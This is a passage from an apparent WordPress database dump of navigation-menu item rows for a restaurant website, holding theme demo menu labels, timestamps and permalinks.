18:56:18','2021-01-23 17:56:18','',0,'https://www.ristorantesolymar.it/2021/01/23/pages-20/',6,'nav_menu_item','',0),(4367,1,'2021-01-23 18:56:18','2021-01-23 17:56:18','','Shop','','publish','closed','closed','','shop-20','','','2021-01-23 18:56:18','2021-01-23 17:56:18','',0,'https://www.ristorantesolymar.it/2021/01/23/shop-20/',15,'nav_menu_item','',0),(4368,1,'2021-01-23 18:56:18','2021-01-23 17:56:18','','Blog','','publish','closed','closed','','blog-20','','','2021-01-23 18:56:18','2021-01-23 17:56:18','',0,'https://www.ristorantesolymar.it/2021/01/23/blog-20/',11,'nav_menu_item','',0),(4369,1,'2021-01-23 18:56:18','2021-01-23 17:56:18','','Product Single','','publish','closed','closed','','product-single-17','','','2021-01-23 18:56:18','2021-01-23 17:56:18','',0,'https://www.ristorantesolymar.it/2021/01/23/product-single-17/',35,'nav_menu_item','',0),(4370,1,'2021-01-23 18:56:18','2021-01-23 17:56:18','','Shop Layouts','','publish','closed','closed','','shop-layouts-9','','','2021-01-23 18:56:18','2021-01-23 17:56:18','',0,'https://www.ristorantesolymar.it/2021/01/23/shop-layouts-9/',36,'nav_menu_item','',0),(4371,1,'2021-01-23 18:56:18','2021-01-23 17:56:18','','Shop Pages','','publish','closed','closed','','shop-pages-9','','','2021-01-23 18:56:18','2021-01-23 17:56:18','',0,'https://www.ristorantesolymar.it/2021/01/23/shop-pages-9/',40,'nav_menu_item','',0),(4372,1,'2021-01-23 18:56:18','2021-01-23 17:56:18','','Product Single','','publish','closed','closed','','product-single-18','','','2021-01-23 18:56:18','2021-01-23 17:56:18','',0,'https://www.ristorantesolymar.it/2021/01/23/product-single-18/',3,'nav_menu_item','',0),(4373,1,'2021-01-23 18:56:18','2021-01-23 17:56:18','','Shop Layouts','','publish','closed','closed','','shop-layouts-10','','','2021-01-23 18:56:18','2021-01-23 17:56:18','',0,'https://www.ristorantesolymar.it/2021/01/23/shop-layouts-10/',4,'nav_menu_item','',0),(4374,1,'2021-01-23 18:56:18','2021-01-23 17:56:18','','Shop Pages','','publish','closed','closed','','shop-pages-10','','','2021-01-23 18:56:18','2021-01-23 17:56:18','',0,'https://www.ristorantesolymar.it/2021/01/23/shop-pages-10/',8,'nav_menu_item','',0),(4375,1,'2021-01-23 18:56:18','2021-01-23 17:56:18','','Product Single','','publish','closed','closed','','product-single-19','','','2021-01-23 18:56:18','2021-01-23 17:56:18','',0,'https://www.ristorantesolymar.it/2021/01/23/product-single-19/',21,'nav_menu_item','',0),(4376,1,'2021-01-23 18:56:18','2021-01-23 17:56:18','','Product Single','','publish','closed','closed','','product-single-20','','','2021-01-23 18:56:18','2021-01-23 17:56:18','',0,'https://www.ristorantesolymar.it/2021/01/23/product-single-20/',17,'nav_menu_item','',0),(4377,1,'2021-01-23 18:56:18','2021-01-23 17:56:18','','Classic','','publish','closed','closed','','classic-9','','','2021-01-23 18:56:18','2021-01-23 17:56:18','',0,'https://www.ristorantesolymar.it/2021/01/23/classic-9/',69,'nav_menu_item','',0),(4378,1,'2021-01-23 18:56:18','2021-01-23 17:56:18','','Presentation','','publish','closed','closed','','presentation-9','','','2021-01-23 18:56:18','2021-01-23 17:56:18','',0,'https://www.ristorantesolymar.it/2021/01/23/presentation-9/',78,'nav_menu_item','',0),(4379,1,'2021-01-23 18:56:18','2021-01-23 17:56:18','','Infographic','','publish','closed','closed','','infographic-9','','','2021-01-23 18:56:18','2021-01-23 17:56:18','',0,'https://www.ristorantesolymar.it/2021/01/23/infographic-9/',86,'nav_menu_item','',0),(4380,1,'2021-01-23 18:56:18','2021-01-23 17:56:18','','Typography','','publish','closed','closed','','typography-9','','','2021-01-23 18:56:18','2021-01-23 17:56:18','',0,'https://www.ristorantesolymar.it/2021/01/23/typography-9/',95,'nav_menu_item','',0),(4381,1,'2021-01-23 18:56:18','2021-01-23 17:56:18','','Classic','','publish','closed','closed','','classic-10','','','2021-01-23 18:56:18','2021-01-23 17:56:18','',0,'https://www.ristorantesolymar.it/2021/01/23/classic-10/',25,'nav_menu_item','',0),(4382,1,'2021-01-23 18:56:18','2021-01-23 17:56:18','','Presentation','','publish','closed','closed','','presentation-10','','','2021-01-23 18:56:18','2021-01-23 17:56:18','',0,'https://www.ristorantesolymar.it/2021/01/23/presentation-10/',34,'nav_menu_item','',0),(4383,1,'2021-01-23 18:56:18','2021-01-23 17:56:18','','Infographic','','publish','closed','closed','','infographic-10','','','2021-01-23 18:56:18','2021-01-23 17:56:18','',0,'https://www.ristorantesolymar.it/2021/01/23/infographic-10/',42,'nav_menu_item','',0),(4384,1,'2021-01-23 18:56:18','2021-01-23 17:56:18','','Typography','','publish','closed','closed','','typography-10','','','2021-01-23 18:56:18','2021-01-23 17:56:18','',0,'https://www.ristorantesolymar.it/2021/01/23/typography-10/',51,'nav_menu_item','',0),(4385,1,'2021-01-23 18:56:18','2021-01-23 17:56:18','','Single Types','','publish','closed','closed','','single-types-13','','','2021-01-23 18:56:18','2021-01-23 17:56:18','',0,'https://www.ristorantesolymar.it/2021/01/23/single-types-13/',62,'nav_menu_item','',0),(4386,1,'2021-01-23 18:56:18','2021-01-23 17:56:18','','Post Types','','publish','closed','closed','','post-types-9','','','2021-01-23 18:56:18','2021-01-23 17:56:18','',0,'https://www.ristorantesolymar.it/2021/01/23/post-types-9/',17,'nav_menu_item','',0),(4387,1,'2021-01-23 18:56:18','2021-01-23 17:56:18','','Post Types','','publish','closed','closed','','post-types-10','','','2021-01-23 18:56:18','2021-01-23 17:56:18','',0,'https://www.ristorantesolymar.it/2021/01/23/post-types-10/',26,'nav_menu_item','',0),(4388,1,'2021-01-23 18:56:19','2021-01-23 17:56:19','','Single Types','','publish','closed','closed','','single-types-14','','','2021-01-23 18:56:19','2021-01-23 17:56:19','',0,'https://www.ristorantesolymar.it/2021/01/23/single-types-14/',39,'nav_menu_item','',0),(4389,1,'2021-01-23 18:56:19','2021-01-23 17:56:19','','Layouts','','publish','closed','closed','','layouts-9','','','2021-01-23 18:56:19','2021-01-23 17:56:19','',0,'https://www.ristorantesolymar.it/2021/01/23/layouts-9/',54,'nav_menu_item','',0),(4390,1,'2021-01-23 18:56:19','2021-01-23 17:56:19','','Slider','','publish','closed','closed','','slider-9','','','2021-01-23 18:56:19','2021-01-23 17:56:19','',0,'https://www.ristorantesolymar.it/2021/01/23/slider-9/',49,'nav_menu_item','',0),(4391,1,'2021-01-23 18:56:19','2021-01-23 17:56:19','','Portfolio','','publish','closed','closed','','portfolio-20','','','2021-01-23 18:56:19','2021-01-23 17:56:19','',0,'https://www.ristorantesolymar.it/2021/01/23/portfolio-20/',20,'nav_menu_item','',0),(4392,1,'2021-01-23 18:56:19','2021-01-23 17:56:19','','Layouts','','publish','closed','closed','','layouts-10','','','2021-01-23 18:56:19','2021-01-23 17:56:19','',0,'https://www.ristorantesolymar.it/2021/01/23/layouts-10/',31,'nav_menu_item','',0),(4393,1,'2021-01-23 18:56:19','2021-01-23 17:56:19','','Slider','','publish','closed','closed','','slider-10','','','2021-01-23 18:56:19','2021-01-23 17:56:19','',0,'https://www.ristorantesolymar.it/2021/01/23/slider-10/',26,'nav_menu_item','',0),(4394,1,'2021-01-23 18:56:22','2021-01-23 17:56:22',' ','','','publish','closed','closed','','4394','','','2021-01-23 18:56:22','2021-01-23 17:56:22','',0,'https://www.ristorantesolymar.it/2021/01/23/4394/',2,'nav_menu_item','',0),(4395,1,'2021-01-23 18:56:22','2021-01-23 17:56:22',' ','','','publish','closed','closed','','4395','','','2021-01-23 18:56:22','2021-01-23 17:56:22','',0,'https://www.ristorantesolymar.it/2021/01/23/4395/',34,'nav_menu_item','',0),(4396,1,'2021-01-23 18:56:22','2021-01-23 17:56:22',' ','','','publish','closed','closed','','4396','','','2021-01-23 18:56:22','2021-01-23 17:56:22','',0,'https://www.ristorantesolymar.it/2021/01/23/4396/',42,'nav_menu_item','',0),(4397,1,'2021-01-23 18:56:22','2021-01-23 17:56:22',' ','','','publish','closed','closed','','4397','','','2021-01-23 18:56:22','2021-01-23 17:56:22','',0,'https://www.ristorantesolymar.it/2021/01/23/4397/',43,'nav_menu_item','',0),(4398,1,'2021-01-23 18:56:22','2021-01-23 17:56:22',' ','','','publish','closed','closed','','4398','','','2021-01-23 18:56:22','2021-01-23 17:56:22','',0,'https://www.ristorantesolymar.it/2021/01/23/4398/',41,'nav_menu_item','',0),(4399,1,'2021-01-23 18:56:22','2021-01-23 17:56:22',' ','','','publish','closed','closed','','4399','','','2021-01-23 18:56:22','2021-01-23 17:56:22','',3039,'https://www.ristorantesolymar.it/2021/01/23/4399/',96,'nav_menu_item','',0),(4400,1,'2021-01-23 18:56:22','2021-01-23 17:56:22',' ','','','publish','closed','closed','','4400','','','2021-01-23 18:56:22','2021-01-23 17:56:22','',3039,'https://www.ristorantesolymar.it/2021/01/23/4400/',52,'nav_menu_item','',0),(4401,1,'2021-01-23 18:56:22','2021-01-23 17:56:22',' ','','','publish','closed','closed','','4401','','','2021-01-23 18:56:22','2021-01-23 17:56:22','',0,'https://www.ristorantesolymar.it/2021/01/23/4401/',2,'nav_menu_item','',0),(4402,1,'2021-01-23 18:56:22','2021-01-23 17:56:22',' ','','','publish','closed','closed','','4402','','','2021-01-23 18:56:22','2021-01-23 17:56:22','',0,'https://www.ristorantesolymar.it/2021/01/23/4402/',11,'nav_menu_item','',0),(4403,1,'2021-01-23 18:56:22','2021-01-23 17:56:22',' ','','','publish','closed','closed','','4403','','','2021-01-23 18:56:22','2021-01-23 17:56:22','',0,'https://www.ristorantesolymar.it/2021/01/23/4403/',9,'nav_menu_item','',0),(4404,1,'2021-01-23 18:56:22','2021-01-23 17:56:22',' ','','','publish','closed','closed','','4404','','','2021-01-23 18:56:22','2021-01-23 17:56:22','',0,'https://www.ristorantesolymar.it/2021/01/23/4404/',10,'nav_menu_item','',0),(4405,1,'2021-01-23 18:56:22','2021-01-23 17:56:22',' ','','','publish','closed','closed','','4405','','','2021-01-23 18:56:22','2021-01-23 17:56:22','',0,'https://www.ristorantesolymar.it/2021/01/23/4405/',20,'nav_menu_item','',0),(4406,1,'2021-01-23 18:56:22','2021-01-23 17:56:22',' ','','','publish','closed','closed','','4406','','','2021-01-23 18:56:22','2021-01-23 17:56:22','',0,'https://www.ristorantesolymar.it/2021/01/23/4406/',16,'nav_menu_item','',0),(4407,1,'2021-01-23 18:56:22','2021-01-23 17:56:22',' ','','','publish','closed','closed','','4407','','','2021-01-23 18:56:22','2021-01-23 17:56:22','',0,'https://www.ristorantesolymar.it/2021/01/23/4407/',4,'nav_menu_item','',0),(4408,1,'2021-01-23 18:56:22','2021-01-23 17:56:22',' ','','','publish','closed','closed','','4408','','','2021-01-23 18:56:22','2021-01-23 17:56:22','',0,'https://www.ristorantesolymar.it/2021/01/23/4408/',3,'nav_menu_item','',0),(4409,1,'2021-01-23 18:56:22','2021-01-23 17:56:22',' ','','','publish','closed','closed','','4409','','','2021-01-23 18:56:22','2021-01-23 17:56:22','',0,'https://www.ristorantesolymar.it/2021/01/23/4409/',4,'nav_menu_item','',0),(4410,1,'2021-01-23 18:56:22','2021-01-23 17:56:22',' ','','','publish','closed','closed','','4410','','','2021-01-23 18:56:22','2021-01-23 17:56:22','',0,'https://www.ristorantesolymar.it/2021/01/23/4410/',3,'nav_menu_item','',0),(4411,1,'2021-01-23 18:56:22','2021-01-23 17:56:22',' ','','','publish','closed','closed','','4411','','','2021-01-23 18:56:22','2021-01-23 17:56:22','',0,'https://www.ristorantesolymar.it/2021/01/23/4411/',12,'nav_menu_item','',0),(4412,1,'2021-01-23 18:56:22','2021-01-23 17:56:22',' ','','','publish','closed','closed','','4412','','','2021-01-23 18:56:22','2021-01-23 17:56:22','',0,'https://www.ristorantesolymar.it/2021/01/23/4412/',19,'nav_menu_item','',0),(4413,1,'2021-01-23 18:56:22','2021-01-23 17:56:22',' ','','','publish','closed','closed','','4413','','','2021-01-23 18:56:22','2021-01-23 17:56:22','',0,'https://www.ristorantesolymar.it/2021/01/23/4413/',44,'nav_menu_item','',0),(4414,1,'2021-01-23 18:56:23','2021-01-23 17:56:23',' ','','','publish','closed','closed','','4414','','','2021-01-23 18:56:23','2021-01-23 17:56:23','',0,'https://www.ristorantesolymar.it/2021/01/23/4414/',13,'nav_menu_item','',0),(4415,1,'2021-01-23 18:56:23','2021-01-23 17:56:23',' ','','','publish','closed','closed','','4415','','','2021-01-23 18:56:23','2021-01-23 17:56:23','',0,'https://www.ristorantesolymar.it/2021/01/23/4415/',13,'nav_menu_item','',0),(4416,1,'2021-01-23 18:56:23','2021-01-23 17:56:23',' ','','','publish','closed','closed','','4416','','','2021-01-23 18:56:23','2021-01-23 17:56:23','',3034,'https://www.ristorantesolymar.it/2021/01/23/4416/',7,'nav_menu_item','',0),(4417,1,'2021-01-23 18:56:23','2021-01-23 17:56:23',' ','','','publish','closed','closed','','4417','','','2021-01-23 18:56:23','2021-01-23 17:56:23','',3034,'https://www.ristorantesolymar.it/2021/01/23/4417/',6,'nav_menu_item','',0),(4418,1,'2021-01-23 18:56:23','2021-01-23 17:56:23',' ','','','publish','closed','closed','','4418','','','2021-01-23 18:56:23','2021-01-23 17:56:23','',3034,'https://www.ristorantesolymar.it/2021/01/23/4418/',5,'nav_menu_item','',0),(4419,1,'2021-01-23 18:56:23','2021-01-23 17:56:23',' ','','','publish','closed','closed','','4419','','','2021-01-23 18:56:23','2021-01-23 17:56:23','',3034,'https://www.ristorantesolymar.it/2021/01/23/4419/',18,'nav_menu_item','',0),(4420,1,'2021-01-23 18:56:23','2021-01-23 17:56:23',' ','','','publish','closed','closed','','4420','','','2021-01-23 18:56:23','2021-01-23 17:56:23','',3034,'https://www.ristorantesolymar.it/2021/01/23/4420/',39,'nav_menu_item','',0),(4421,1,'2021-01-23 18:56:23','2021-01-23 17:56:23',' ','','','publish','closed','closed','','4421','','','2021-01-23 18:56:23','2021-01-23 17:56:23','',3034,'https://www.ristorantesolymar.it/2021/01/23/4421/',38,'nav_menu_item','',0),(4422,1,'2021-01-23 18:56:23','2021-01-23 17:56:23',' ','','','publish','closed','closed','','4422','','','2021-01-23 18:56:23','2021-01-23 17:56:23','',3034,'https://www.ristorantesolymar.it/2021/01/23/4422/',37,'nav_menu_item','',0),(4423,1,'2021-01-23 18:56:23','2021-01-23 17:56:23',' ','','','publish','closed','closed','','4423','','','2021-01-23 18:56:23','2021-01-23 17:56:23','',0,'https://www.ristorantesolymar.it/2021/01/23/4423/',14,'nav_menu_item','',0),(4424,1,'2021-01-23 18:56:23','2021-01-23 17:56:23',' ','','','publish','closed','closed','','4424','','','2021-01-23 18:56:23','2021-01-23 17:56:23','',0,'https://www.ristorantesolymar.it/2021/01/23/4424/',21,'nav_menu_item','',0),(4425,1,'2021-01-23 18:56:23','2021-01-23 17:56:23',' ','','','publish','closed','closed','','4425','','','2021-01-23 18:56:23','2021-01-23 17:56:23','',0,'https://www.ristorantesolymar.it/2021/01/23/4425/',15,'nav_menu_item','',0),(4426,1,'2021-01-23 18:56:23','2021-01-23 17:56:23',' ','','','publish','closed','closed','','4426','','','2021-01-23 18:56:23','2021-01-23 17:56:23','',0,'https://www.ristorantesolymar.it/2021/01/23/4426/',16,'nav_menu_item','',0),(4427,1,'2021-01-23 18:56:23','2021-01-23 17:56:23',' ','','','publish','closed','closed','','4427','','','2021-01-23 18:56:23','2021-01-23 17:56:23','',0,'https://www.ristorantesolymar.it/2021/01/23/4427/',2,'nav_menu_item','',0),(4428,1,'2021-01-23 18:56:23','2021-01-23 17:56:23',' ','','','publish','closed','closed','','4428','','','2021-01-23 18:56:23','2021-01-23 17:56:23','',0,'https://www.ristorantesolymar.it/2021/01/23/4428/',3,'nav_menu_item','',0),(4429,1,'2021-01-23 18:56:23','2021-01-23 17:56:23',' ','','','publish','closed','closed','','4429','','','2021-01-23 18:56:23','2021-01-23 17:56:23','',0,'https://www.ristorantesolymar.it/2021/01/23/4429/',2,'nav_menu_item','',0),(4430,1,'2021-01-23 18:56:23','2021-01-23 17:56:23',' ','','','publish','closed','closed','','4430','','','2021-01-23 18:56:23','2021-01-23 17:56:23','',0,'https://www.ristorantesolymar.it/2021/01/23/4430/',2,'nav_menu_item','',0),(4431,1,'2021-01-23 18:56:23','2021-01-23 17:56:23',' ','','','publish','closed','closed','','4431','','','2021-01-23 18:56:23','2021-01-23 17:56:23','',0,'https://www.ristorantesolymar.it/2021/01/23/4431/',18,'nav_menu_item','',0),(4432,1,'2021-01-23 18:56:23','2021-01-23 17:56:23',' ','','','publish','closed','closed','','4432','','','2021-01-23 18:56:23','2021-01-23 17:56:23','',0,'https://www.ristorantesolymar.it/2021/01/23/4432/',9,'nav_menu_item','',0),(4433,1,'2021-01-23 18:56:23','2021-01-23 17:56:23',' ','','','publish','closed','closed','','4433','','','2021-01-23 18:56:23','2021-01-23 17:56:23','',0,'https://www.ristorantesolymar.it/2021/01/23/4433/',9,'nav_menu_item','',0),(4434,1,'2021-01-23 18:56:23','2021-01-23 17:56:23',' ','','','publish','closed','closed','','4434','','','2021-01-23 18:56:23','2021-01-23 17:56:23','',0,'https://www.ristorantesolymar.it/2021/01/23/4434/',5,'nav_menu_item','',0),(4435,1,'2021-01-23 18:56:23','2021-01-23 17:56:23',' ','','','publish','closed','closed','','4435','','','2021-01-23 18:56:23','2021-01-23 17:56:23','',0,'https://www.ristorantesolymar.it/2021/01/23/4435/',7,'nav_menu_item','',0),(4436,1,'2021-01-23 18:56:23','2021-01-23 17:56:23',' ','','','publish','closed','closed','','4436','','','2021-01-23 18:56:23','2021-01-23 17:56:23','',0,'https://www.ristorantesolymar.it/2021/01/23/4436/',7,'nav_menu_item','',0),(4437,1,'2021-01-23 18:56:23','2021-01-23 17:56:23',' ','','','publish','closed','closed','','4437','','','2021-01-23 18:56:23','2021-01-23 17:56:23','',0,'https://www.ristorantesolymar.it/2021/01/23/4437/',5,'nav_menu_item','',0),(4438,1,'2021-01-23 18:56:23','2021-01-23 17:56:23',' ','','','publish','closed','closed','','4438','','','2021-01-23 18:56:23','2021-01-23 17:56:23','',0,'https://www.ristorantesolymar.it/2021/01/23/4438/',5,'nav_menu_item','',0),(4439,1,'2021-01-23 18:56:23','2021-01-23 17:56:23',' ','','','publish','closed','closed','','4439','','','2021-01-23 18:56:23','2021-01-23 17:56:23','',0,'https://www.ristorantesolymar.it/2021/01/23/4439/',12,'nav_menu_item','',0),(4440,1,'2021-01-23 18:56:23','2021-01-23 17:56:23',' ','','','publish','closed','closed','','4440','','','2021-01-23 18:56:23','2021-01-23 17:56:23','',0,'https://www.ristorantesolymar.it/2021/01/23/4440/',19,'nav_menu_item','',0),(4441,1,'2021-01-23 18:56:23','2021-01-23 17:56:23',' ','','','publish','closed','closed','','4441','','','2021-01-23 18:56:23','2021-01-23 17:56:23','',0,'https://www.ristorantesolymar.it/2021/01/23/4441/',17,'nav_menu_item','',0),(4442,1,'2021-01-23 18:56:23','2021-01-23 17:56:23',' ','','','publish','closed','closed','','4442','','','2021-01-23 18:56:23','2021-01-23 17:56:23','',0,'https://www.ristorantesolymar.it/2021/01/23/4442/',20,'nav_menu_item','',0),(4443,1,'2021-01-23 18:56:23','2021-01-23 17:56:23',' ','','','publish','closed','closed','','4443','','','2021-01-23 18:56:23','2021-01-23 17:56:23','',0,'https://www.ristorantesolymar.it/2021/01/23/4443/',8,'nav_menu_item','',0),(4444,1,'2021-01-23 18:56:23','2021-01-23 17:56:23',' ','','','publish','closed','closed','','4444','','','2021-01-23 18:56:23','2021-01-23 17:56:23','',0,'https://www.ristorantesolymar.it/2021/01/23/4444/',8,'nav_menu_item','',0),(4445,1,'2021-01-23 18:56:23','2021-01-23 17:56:23',' ','','','publish','closed','closed','','4445','','','2021-01-23 18:56:23','2021-01-23 17:56:23','',0,'https://www.ristorantesolymar.it/2021/01/23/4445/',4,'nav_menu_item','',0),(4446,1,'2021-01-23 18:56:23','2021-01-23 17:56:23','','Four Columns Wide','','publish','closed','closed','','four-columns-wide-9','','','2021-01-23 18:56:23','2021-01-23 17:56:23','',3061,'https://www.ristorantesolymar.it/2021/01/23/four-columns-wide-9/',57,'nav_menu_item','',0),(4447,1,'2021-01-23 18:56:24','2021-01-23 17:56:24','','Four Columns','','publish','closed','closed','','four-columns-9','','','2021-01-23 18:56:24','2021-01-23 17:56:24','',3061,'https://www.ristorantesolymar.it/2021/01/23/four-columns-9/',56,'nav_menu_item','',0),(4448,1,'2021-01-23 18:56:24','2021-01-23 17:56:24','','Three Columns','','publish','closed','closed','','three-columns-9','','','2021-01-23 18:56:24','2021-01-23 17:56:24','',3061,'https://www.ristorantesolymar.it/2021/01/23/three-columns-9/',55,'nav_menu_item','',0),(4449,1,'2021-01-23 18:56:24','2021-01-23 17:56:24','','Big Slider','','publish','closed','closed','','big-slider-9','','','2021-01-23 18:56:24','2021-01-23 17:56:24','',0,'https://www.ristorantesolymar.it/2021/01/23/big-slider-9/',65,'nav_menu_item','',0),(4450,1,'2021-01-23 18:56:24','2021-01-23 17:56:24','','Small Images','','publish','closed','closed','','small-images-9','','','2021-01-23 18:56:24','2021-01-23 17:56:24','',0,'https://www.ristorantesolymar.it/2021/01/23/small-images-9/',64,'nav_menu_item','',0),(4451,1,'2021-01-23 18:56:24','2021-01-23 17:56:24','','Big Images','','publish','closed','closed','','big-images-9','','','2021-01-23 18:56:24','2021-01-23 17:56:24','',0,'https://www.ristorantesolymar.it/2021/01/23/big-images-9/',63,'nav_menu_item','',0),(4452,1,'2021-01-23 18:56:24','2021-01-23 17:56:24','','Big Gallery','','publish','closed','closed','','big-gallery-9','','','2021-01-23 18:56:24','2021-01-23 17:56:24','',0,'https://www.ristorantesolymar.it/2021/01/23/big-gallery-9/',67,'nav_menu_item','',0),(4453,1,'2021-01-23 18:56:24','2021-01-23 17:56:24',' ','','','publish','closed','closed','','4453','','','2021-01-23 18:56:24','2021-01-23 17:56:24','',0,'https://www.ristorantesolymar.it/2021/01/23/4453/',6,'nav_menu_item','',0),(4454,1,'2021-01-23 18:56:24','2021-01-23 17:56:24',' ','','','publish','closed','closed','','4454','','','2021-01-23 18:56:24','2021-01-23 17:56:24','',0,'https://www.ristorantesolymar.it/2021/01/23/4454/',6,'nav_menu_item','',0),(4455,1,'2021-01-23 18:56:24','2021-01-23 17:56:24',' ','','','publish','closed','closed','','4455','','','2021-01-23 18:56:24','2021-01-23 17:56:24','',3039,'https://www.ristorantesolymar.it/2021/01/23/4455/',70,'nav_menu_item','',0),(4456,1,'2021-01-23 18:56:24','2021-01-23 17:56:24',' ','','','publish','closed','closed','','4456','','','2021-01-23 18:56:24','2021-01-23 17:56:24','',3039,'https://www.ristorantesolymar.it/2021/01/23/4456/',97,'nav_menu_item','',0),(4457,1,'2021-01-23 18:56:24','2021-01-23 17:56:24',' ','','','publish','closed','closed','','4457','','','2021-01-23 18:56:24','2021-01-23 17:56:24','',3039,'https://www.ristorantesolymar.it/2021/01/23/4457/',98,'nav_menu_item','',0),(4458,1,'2021-01-23 18:56:24','2021-01-23 17:56:24',' ','','','publish','closed','closed','','4458','','','2021-01-23 18:56:24','2021-01-23 17:56:24','',3039,'https://www.ristorantesolymar.it/2021/01/23/4458/',26,'nav_menu_item','',0),(4459,1,'2021-01-23 18:56:24','2021-01-23 17:56:24',' ','','','publish','closed','closed','','4459','','','2021-01-23 18:56:24','2021-01-23 17:56:24','',3039,'https://www.ristorantesolymar.it/2021/01/23/4459/',53,'nav_menu_item','',0),(4460,1,'2021-01-23 18:56:24','2021-01-23 17:56:24',' ','','','publish','closed','closed','','4460','','','2021-01-23 18:56:24','2021-01-23 17:56:24','',3039,'https://www.ristorantesolymar.it/2021/01/23/4460/',54,'nav_menu_item','',0),(4461,1,'2021-01-23 18:56:24','2021-01-23 17:56:24',' ','','','publish','closed','closed','','4461','','','2021-01-23 18:56:24','2021-01-23 17:56:24','',3039,'https://www.ristorantesolymar.it/2021/01/23/4461/',27,'nav_menu_item','',0),(4462,1,'2021-01-23 18:56:24','2021-01-23 17:56:24',' ','','','publish','closed','closed','','4462','','','2021-01-23 18:56:24','2021-01-23 17:56:24','',3039,'https://www.ristorantesolymar.it/2021/01/23/4462/',71,'nav_menu_item','',0),(4463,1,'2021-01-23 18:56:24','2021-01-23 17:56:24',' ','','','publish','closed','closed','','4463','','','2021-01-23 18:56:24','2021-01-23 17:56:24','',3039,'https://www.ristorantesolymar.it/2021/01/23/4463/',73,'nav_menu_item','',0),(4464,1,'2021-01-23 18:56:24','2021-01-23 17:56:24',' ','','','publish','closed','closed','','4464','','','2021-01-23 18:56:24','2021-01-23 17:56:24','',3039,'https://www.ristorantesolymar.it/2021/01/23/4464/',29,'nav_menu_item','',0),(4465,1,'2021-01-23 18:56:24','2021-01-23 17:56:24',' ','','','publish','closed','closed','','4465','','','2021-01-23 18:56:24','2021-01-23 17:56:24','',3039,'https://www.ristorantesolymar.it/2021/01/23/4465/',43,'nav_menu_item','',0),(4466,1,'2021-01-23 18:56:24','2021-01-23 17:56:24',' ','','','publish','closed','closed','','4466','','','2021-01-23 18:56:24','2021-01-23 17:56:24','',3039,'https://www.ristorantesolymar.it/2021/01/23/4466/',36,'nav_menu_item','',0),(4467,1,'2021-01-23 18:56:24','2021-01-23 17:56:24',' ','','','publish','closed','closed','','4467','','','2021-01-23 18:56:24','2021-01-23 17:56:24','',3039,'https://www.ristorantesolymar.it/2021/01/23/4467/',44,'nav_menu_item','',0),(4468,1,'2021-01-23 18:56:24','2021-01-23 17:56:24',' ','','','publish','closed','closed','','4468','','','2021-01-23 18:56:24','2021-01-23 17:56:24','',3039,'https://www.ristorantesolymar.it/2021/01/23/4468/',80,'nav_menu_item','',0),(4469,1,'2021-01-23 18:56:24','2021-01-23 17:56:24',' ','','','publish','closed','closed','','4469','','','2021-01-23 18:56:24','2021-01-23 17:56:24','',3039,'https://www.ristorantesolymar.it/2021/01/23/4469/',88,'nav_menu_item','',0),(4470,1,'2021-01-23 18:56:24','2021-01-23 17:56:24',' ','','','publish','closed','closed','','4470','','','2021-01-23 18:56:24','2021-01-23 17:56:24','',3039,'https://www.ristorantesolymar.it/2021/01/23/4470/',87,'nav_menu_item','',0),(4471,1,'2021-01-23 18:56:24','2021-01-23 17:56:24',' ','','','publish','closed','closed','','4471','','','2021-01-23 18:56:24','2021-01-23 17:56:24','',3039,'https://www.ristorantesolymar.it/2021/01/23/4471/',79,'nav_menu_item','',0),(4472,1,'2021-01-23 18:56:24','2021-01-23 17:56:24',' ','','','publish','closed','closed','','4472','','','2021-01-23 18:56:24','2021-01-23 17:56:24','',3039,'https://www.ristorantesolymar.it/2021/01/23/4472/',35,'nav_menu_item','',0),(4473,1,'2021-01-23 18:56:24','2021-01-23 17:56:24',' ','','','publish','closed','closed','','4473','','','2021-01-23 18:56:24','2021-01-23 17:56:24','',3039,'https://www.ristorantesolymar.it/2021/01/23/4473/',30,'nav_menu_item','',0),(4474,1,'2021-01-23 18:56:24','2021-01-23 17:56:24',' ','','','publish','closed','closed','','4474','','','2021-01-23 18:56:24','2021-01-23 17:56:24','',3039,'https://www.ristorantesolymar.it/2021/01/23/4474/',74,'nav_menu_item','',0),(4475,1,'2021-01-23 18:56:24','2021-01-23 17:56:24',' ','','','publish','closed','closed','','4475','','','2021-01-23 18:56:24','2021-01-23 17:56:24','',3039,'https://www.ristorantesolymar.it/2021/01/23/4475/',81,'nav_menu_item','',0),(4476,1,'2021-01-23 18:56:24','2021-01-23 17:56:24',' ','','','publish','closed','closed','','4476','','','2021-01-23 18:56:24','2021-01-23 17:56:24','',3039,'https://www.ristorantesolymar.it/2021/01/23/4476/',37,'nav_menu_item','',0),(4477,1,'2021-01-23 18:56:24','2021-01-23 17:56:24',' ','','','publish','closed','closed','','4477','','','2021-01-23 18:56:24','2021-01-23 17:56:24','',3039,'https://www.ristorantesolymar.it/2021/01/23/4477/',28,'nav_menu_item','',0),(4478,1,'2021-01-23 18:56:25','2021-01-23 17:56:25',' ','','','publish','closed','closed','','4478','','','2021-01-23 18:56:25','2021-01-23 17:56:25','',3039,'https://www.ristorantesolymar.it/2021/01/23/4478/',47,'nav_menu_item','',0),(4479,1,'2021-01-23 18:56:25','2021-01-23 17:56:25',' ','','','publish','closed','closed','','4479','','','2021-01-23 18:56:25','2021-01-23 17:56:25','',3039,'https://www.ristorantesolymar.it/2021/01/23/4479/',72,'nav_menu_item','',0),(4480,1,'2021-01-23 18:56:25','2021-01-23 17:56:25',' ','','','publish','closed','closed','','4480','','','2021-01-23 18:56:25','2021-01-23 17:56:25','',3039,'https://www.ristorantesolymar.it/2021/01/23/4480/',91,'nav_menu_item','',0),(4481,1,'2021-01-23 18:56:25','2021-01-23 17:56:25',' ','','','publish','closed','closed','','4481','','','2021-01-23 18:56:25','2021-01-23 17:56:25','',0,'https://www.ristorantesolymar.it/2021/01/23/4481/',23,'nav_menu_item','',0),(4482,1,'2021-01-23 18:56:25','2021-01-23 17:56:25','','Standard','','publish','closed','closed','','standard-5','','','2021-01-23 18:56:25','2021-01-23 17:56:25','',0,'https://www.ristorantesolymar.it/2021/01/23/standard-5/',27,'nav_menu_item','',0),(4483,1,'2021-01-23 18:56:25','2021-01-23 17:56:25','','Gallery','','publish','closed','closed','','gallery-5','','','2021-01-23 18:56:25','2021-01-23 17:56:25','',0,'https://www.ristorantesolymar.it/2021/01/23/gallery-5/',28,'nav_menu_item','',0),(4484,1,'2021-01-23 18:56:25','2021-01-23 17:56:25','','Link','','publish','closed','closed','','link-5','','','2021-01-23 18:56:25','2021-01-23 17:56:25','',0,'https://www.ristorantesolymar.it/2021/01/23/link-5/',29,'nav_menu_item','',0),(4485,1,'2021-01-23 18:56:25','2021-01-23 